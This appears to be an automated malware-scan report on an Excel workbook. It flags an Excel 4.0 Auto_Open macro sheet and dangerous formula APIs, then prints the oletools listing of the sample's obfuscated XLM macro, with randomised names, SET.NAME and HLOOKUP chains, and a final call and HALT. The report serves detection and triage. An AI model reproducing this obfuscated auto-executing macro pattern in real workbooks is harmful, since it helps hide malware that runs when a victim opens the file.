MALICIOUS
Risk Score: 140
Heuristics: 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6900 bytes |

SHA-256: 437bdb893d13ef5222300489b73be6e93bebfc54c66f06424abd230a5959e697

Preview script (first 1,000 lines of the extracted script):
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - cZXLHVMAha
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G176
' 0018 21 LABEL : Cell Value, String Constant - dflzQr len=0
' 0018 25 LABEL : Cell Value, String Constant - eeTfhaqnrg len=0
' 0018 20 LABEL : Cell Value, String Constant - epxzV len=0
' 0018 23 LABEL : Cell Value, String Constant - EQEnfKaE len=0
' 0018 27 LABEL : Cell Value, String Constant - GQMFSzSCTxKU len=0
' 0018 20 LABEL : Cell Value, String Constant - HGdFz len=0
' 0018 27 LABEL : Cell Value, String Constant - JPNgfJVQtDkI len=0
' 0018 20 LABEL : Cell Value, String Constant - lHxJf len=0
' 0018 24 LABEL : Cell Value, String Constant - LpozcBdHB len=0
' 0018 24 LABEL : Cell Value, String Constant - LSRqIZEvl len=0
' 0018 25 LABEL : Cell Value, String Constant - lUFRNOYwJo len=0
' 0018 20 LABEL : Cell Value, String Constant - LxkxQ len=0
' 0018 21 LABEL : Cell Value, String Constant - NBNPmj len=0
' 0018 27 LABEL : Cell Value, String Constant - ogURyEtLWcot len=0
' 0018 27 LABEL : Cell Value, String Constant - OWdnPidJwLNA len=0
' 0018 27 LABEL : Cell Value, String Constant - PeiSzvWAIZOy len=0
' 0018 27 LABEL : Cell Value, String Constant - rSOqZMxjPvIW len=0
' 0018 27 LABEL : Cell Value, String Constant - TtZfPTorCnem len=0
' 0018 21 LABEL : Cell Value, String Constant - vpKxbs len=0
' 0018 23 LABEL : Cell Value, String Constant - XRRSSnGe len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' cZXLHVMAha,Q93,"",-758.00000000000000000000
' cZXLHVMAha,G94,"SET.NAME("lUFRNOYwJo",0+VALUE("0"))",""
' cZXLHVMAha,Q94,"",829.00000000000000000000
' cZXLHVMAha,Q95,"",425.00000000000000000000
' cZXLHVMAha,Q96,"",-623.00000000000000000000
' cZXLHVMAha,Q97,"",-980.00000000000000000000
' cZXLHVMAha,Q98,"",411.00000000000000000000
' cZXLHVMAha,G99,"SET.NAME("epxzV",lUFRNOYwJo)",""
' cZXLHVMAha,G101,"SET.NAME("eeTfhaqnrg",lUFRNOYwJo)",""
' cZXLHVMAha,G106,"SET.NAME("EQEnfKaE",COUNTA(LSRqIZEvl))",""
' cZXLHVMAha,G108,"SET.NAME("HGdFz",COUNTA(vpKxbs))",""
' cZXLHVMAha,G111,[],""
' cZXLHVMAha,G115,"SET.NAME("XRRSSnGe","")",""
' cZXLHVMAha,G118,"epxzV",""
' cZXLHVMAha,G121,"SET.NAME("JPNgfJVQtDkI",HLOOKUP("*",LSRqIZEvl,epxzV,FALSE))",""
' cZXLHVMAha,G124,"rSOqZMxjPvIW",""
' cZXLHVMAha,G128,"SET.NAME("NBNPmj",lUFRNOYwJo)",""
' cZXLHVMAha,G131,[],""
' cZXLHVMAha,G133,"NBNPmj",""
' cZXLHVMAha,G135,"dflzQr",""
' cZXLHVMAha,G137,"TtZfPTorCnem",""
' cZXLHVMAha,G139,"ogURyEtLWcot",""
' cZXLHVMAha,G141,"SET.NAME("OWdnPidJwLNA",VALUE(HLOOKUP("*",vpKxbs,ogURyEtLWcot,FALSE)))",""
' cZXLHVMAha,G144,"GQMFSzSCTxKU",""
' cZXLHVMAha,G146,"XRRSSnGe",""
' cZXLHVMAha,G151,"eeTfhaqnrg",""
' cZXLHVMAha,G154,NEXT(),""
' cZXLHVMAha,G159,"LxkxQ",""
' cZXLHVMAha,G163,[],""
' cZXLHVMAha,G167,"lHxJf",""
' cZXLHVMAha,G169,NEXT(),""
' cZXLHVMAha,G174,RETURN(),""
' cZXLHVMAha,G196,"SET.NAME("LpozcBdHB",G94)",""
' cZXLHVMAha,G198,"LSRqIZEvl",""
' cZXLHVMAha,G203,"SET.NAME("vpKxbs",R73C15)",""
' cZXLHVMAha,G207,"SET.NAME("lHxJf",215)",""
' cZXLHVMAha,G210,"SET.NAME("PeiSzvWAIZOy",7)",""
' cZXLHVMAha,G214,LpozcBdHB(),""
' cZXLHVMAha,G215,HALT(),""